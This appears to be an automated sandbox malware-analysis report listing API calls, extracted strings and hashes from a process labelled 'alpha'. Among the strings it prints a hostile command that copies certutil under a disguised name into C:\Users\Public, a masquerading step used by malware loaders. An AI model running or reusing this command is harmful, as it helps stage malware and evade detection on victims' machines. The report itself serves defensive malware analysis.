                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                      • String ID:
                                      • API String ID: 920682188-0
                                      • Opcode ID: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                      • Instruction ID: 910a1d418f8973fd5545b1441f78bf24199094f16b9565a58b6d2fdfb8bf5d4b
                                      • Opcode Fuzzy Hash: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                      • Instruction Fuzzy Hash: B551367B705BC28AEB21EF20D8542E8B7A1FB89B89F888135CA4D47754EF3CD6458710
                                      APIs
                                      Strings
                                      • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF755CAE00B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess_setjmp
                                      • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                      • API String ID: 777023205-3344945345
                                      APIs
                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF1BA
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF1E7
                                      • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF1FF
                                      • iswdigit.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF2BB
                                      Similarity
                                      • API ID: iswdigit$iswspacewcschr
                                      • String ID: )$=,;
                                      • API String ID: 1959970872-2167043656
                                      Similarity
                                      • API ID: _wcsnicmpfprintfwcsrchr
                                      • String ID: CMD Internal Error %s$%s$Null environment
                                      • API String ID: 3625580822-2781220306
                                      Similarity
                                      • API ID: memsetwcsspn
                                      • String ID:
                                      • API String ID: 3809306610-0
                                      Similarity
                                      • API ID: wcschr$iswdigit$wcstol
                                      • String ID:
                                      • API String ID: 3841054028-0
                                      APIs
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CC3687
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF755CA260D), ref: 00007FF755CC36A6
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF755CA260D), ref: 00007FF755CC36EB
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CC3703
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF755CA260D), ref: 00007FF755CC3722
                                      Similarity
                                      • API ID: Console$Write_get_osfhandle$Mode
                                      • String ID:
                                      • API String ID: 1066134489-0
                                      Similarity
                                      • API ID: memset$DriveErrorInformationLastTypeVolume
                                      • String ID:
                                      • API String ID: 850181435-0
                                      APIs
                                        • Part of subcall function 00007FF755CB3578: _get_osfhandle.MSVCRT ref: 00007FF755CB3584
                                        • Part of subcall function 00007FF755CB3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB359C
                                        • Part of subcall function 00007FF755CB3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35C3
                                        • Part of subcall function 00007FF755CB3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35D9
                                        • Part of subcall function 00007FF755CB3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35ED
                                        • Part of subcall function 00007FF755CB3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB3602
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB3514
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CB3522
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB3541
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB355E
                                        • Part of subcall function 00007FF755CB36EC: _get_osfhandle.MSVCRT ref: 00007FF755CB3715
                                        • Part of subcall function 00007FF755CB36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF755CB3770
                                        • Part of subcall function 00007FF755CB36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB3791
                                      Similarity
                                      • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                      • String ID:
                                      • API String ID: 4057327938-0
                                      Similarity
                                      • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                      • String ID: KEYS$LIST$OFF
                                      • API String ID: 411561164-4129271751
                                      APIs
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CB01C4
                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB01D6
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB0212
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB0228
                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB023C
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB0251
                                      Similarity
                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                      • String ID:
                                      • API String ID: 513048808-0
                                      Similarity
                                      • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                      • String ID:
                                      • API String ID: 4104442557-0
                                      APIs
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CB3584
                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB359C
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35C3
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35D9
                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35ED
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB3602
                                      Similarity
                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                      • String ID:
                                      • API String ID: 513048808-0
                                      APIs
                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF755CC71F9
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CC720D
                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF755CC7300
                                        • Part of subcall function 00007FF755CC5740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF755CC75C4,?,?,00000000,00007FF755CC6999,?,?,?,?,?,00007FF755CB8C39), ref: 00007FF755CC5744
                                      Similarity
                                      • API ID: OpenSemaphore$CloseErrorHandleLast
                                      • String ID: _p0$wil
                                      • API String ID: 455305043-1814513734
                                      • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                      • Instruction ID: c95d6d30fe2d28ed92e77995515a0e19b885b6e8159abf3bc6699f9849ceb881
                                      • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                      • Instruction Fuzzy Hash: B661B0ABB18A83C1EE61AB6595141B9A3E1EF84F88FDC6435DA1E47794EF3CD5008320
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heapiswspacememset$AllocProcess
                                      • String ID: %s
                                      • API String ID: 2401724867-3043279178
                                      • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                      • Instruction ID: 59f22f30dca067675f332b1fa4620251a3452ecb6ce49aa8742f0b66d75e577b
                                      • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                      • Instruction Fuzzy Hash: 5F51A3BBA0868385EB61AF11D8502B9B7A0EB49F98FC85135DA5D47794EF3CE441C720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswdigit
                                      • String ID: GeToken: (%x) '%s'
                                      • API String ID: 3849470556-1994581435
                                      • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                      • Instruction ID: 15c3124fb9d39e7d333c8b9ad81e49a0f3ef7bf77a1f95637a46b36c8adfa514
                                      • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                      • Instruction Fuzzy Hash: 5A519CBBA0864385E760AF55E484179BBA0FF45F18F889935DA4D43390EF7CE841C3A0
                                      APIs
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CC9A10
                                      • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CC9994
                                        • Part of subcall function 00007FF755CCA73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA77A
                                        • Part of subcall function 00007FF755CCA73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA839
                                        • Part of subcall function 00007FF755CCA73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA850
                                      • wcsrchr.MSVCRT ref: 00007FF755CC9A62
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                      • String ID: %s=%s$.
                                      • API String ID: 3242694432-4275322459
                                      • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                      • Instruction ID: 27c4f8f620c13c1c9dfadd32d95ead1ee4bf5e8d9e85688c29a768319006fee1
                                      • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                      • Instruction Fuzzy Hash: 2841A0ABA0978385EA10BB51A450279E6A0AF85FA8FC85630DD6D0B7D1EE3CF4418320
                                      APIs
                                      • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF755CC54E6
                                      • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF755CC552E
                                        • Part of subcall function 00007FF755CC758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF755CC6999,?,?,?,?,?,00007FF755CB8C39), ref: 00007FF755CC75AE
                                        • Part of subcall function 00007FF755CC758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF755CC6999,?,?,?,?,?,00007FF755CB8C39), ref: 00007FF755CC75C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CreateCurrentMutexProcess
                                      • String ID: Local\SM0:%d:%d:%hs$wil$x
                                      • API String ID: 779401067-630742106
                                      • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                      • Instruction ID: 319a19ab9d677036dfa3adb70757eb59e886d9fc75ab889eba3dfb13c592bdea
                                      • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                      • Instruction Fuzzy Hash: 4951A6BBA1868382EB51AB15E4047FAE360EF84F98FD85032DA5D8BB55DE3CD445C720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CurrentDirectorytowupper
                                      • String ID: :$:
                                      • API String ID: 238703822-3780739392
                                      • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                      • Instruction ID: 4e3324ae72aaf9f588b44bcb50bfcacf3b9686d3de5c799d8bc5a0741d79b3bb
                                      • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                      • Instruction Fuzzy Hash: F511389BA0824281EB24AB61A804239F6E0EF8DFADFCD8132DD0D47751DF3CD4018724
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                      • API String ID: 3677997916-3870813718
                                      • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                      • Instruction ID: 4047ecb8fefeff54818d780c4ee81cdc8aa44fba7473b608d3c8b2fa863da3d2
                                      • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                      • Instruction Fuzzy Hash: 85113DBB618A8287EB109B10F44426AFB64FB85B68F844131DB8D46768DF7CC048CB50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memsetwcsrchr$wcschr
                                      • String ID:
                                      • API String ID: 110935159-0
                                      • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                      • Instruction ID: c182fcdabe4aec69cb4f6b1ab81df1110273845bb065f8ef6182ececc411629b
                                      • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                      • Instruction Fuzzy Hash: C551B5A7B0978386FA61AB51D8447F9E790BB49FACF8C4630CE5E4B784DE3CE5418210
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$CurrentDirectorytowupper
                                      • String ID:
                                      • API String ID: 1403193329-0
                                      • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                      • Instruction ID: b68540a24c14c419329bc0e538e1534017e8ebb1e9651a8e135dc8fe28fd25ea
                                      • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                      • Instruction Fuzzy Hash: 3251946BA0568385EB65AF21D9406BAB7A0EF48F6CFC98135DA4D07794EF3C9944C320
                                      APIs
                                      • memset.MSVCRT ref: 00007FF755CA921C
                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CA93AA
                                        • Part of subcall function 00007FF755CA8B20: wcsrchr.MSVCRT ref: 00007FF755CA8BAB
                                        • Part of subcall function 00007FF755CA8B20: _wcsicmp.MSVCRT ref: 00007FF755CA8BD4
                                        • Part of subcall function 00007FF755CA8B20: _wcsicmp.MSVCRT ref: 00007FF755CA8BF2
                                        • Part of subcall function 00007FF755CA8B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CA8C16
                                        • Part of subcall function 00007FF755CA8B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CA8C2F
                                        • Part of subcall function 00007FF755CA8B20: wcschr.MSVCRT ref: 00007FF755CA8CB3
                                        • Part of subcall function 00007FF755CB417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF755CB41AD
                                        • Part of subcall function 00007FF755CB3060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF755CA92AC), ref: 00007FF755CB30CA
                                        • Part of subcall function 00007FF755CB3060: SetErrorMode.KERNELBASE ref: 00007FF755CB30DD
                                        • Part of subcall function 00007FF755CB3060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB30F6
                                        • Part of subcall function 00007FF755CB3060: SetErrorMode.KERNELBASE ref: 00007FF755CB3106
                                      • wcsrchr.MSVCRT ref: 00007FF755CA92D8
                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CA9362
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CA9373
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                      • String ID:
                                      • API String ID: 3966000956-0
                                      • Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                      • Instruction ID: 878c630718ce78996cda87a868388e6969694826a4db85f7d0b83b7ac45be465
                                      • Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                      • Instruction Fuzzy Hash: 3251B07BA0A68386EB61AF21D8512BDA7A0FB49F9CF885435CA4D0B794DF3CE551C310
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$_setjmp
                                      • String ID:
                                      • API String ID: 3883041866-0
                                      • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                      • Instruction ID: 8dc537b3aeee08a3f130816f35646e9930f2fee496217d54ab0de73bb6021bba
                                      • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                      • Instruction Fuzzy Hash: 77515FB7608B868AEB61DF21D8503E9B7A4FB49B48F884135DA4D87B48DF3CD645CB10
                                      APIs
                                      • _wcsicmp.MSVCRT ref: 00007FF755CAB4BD
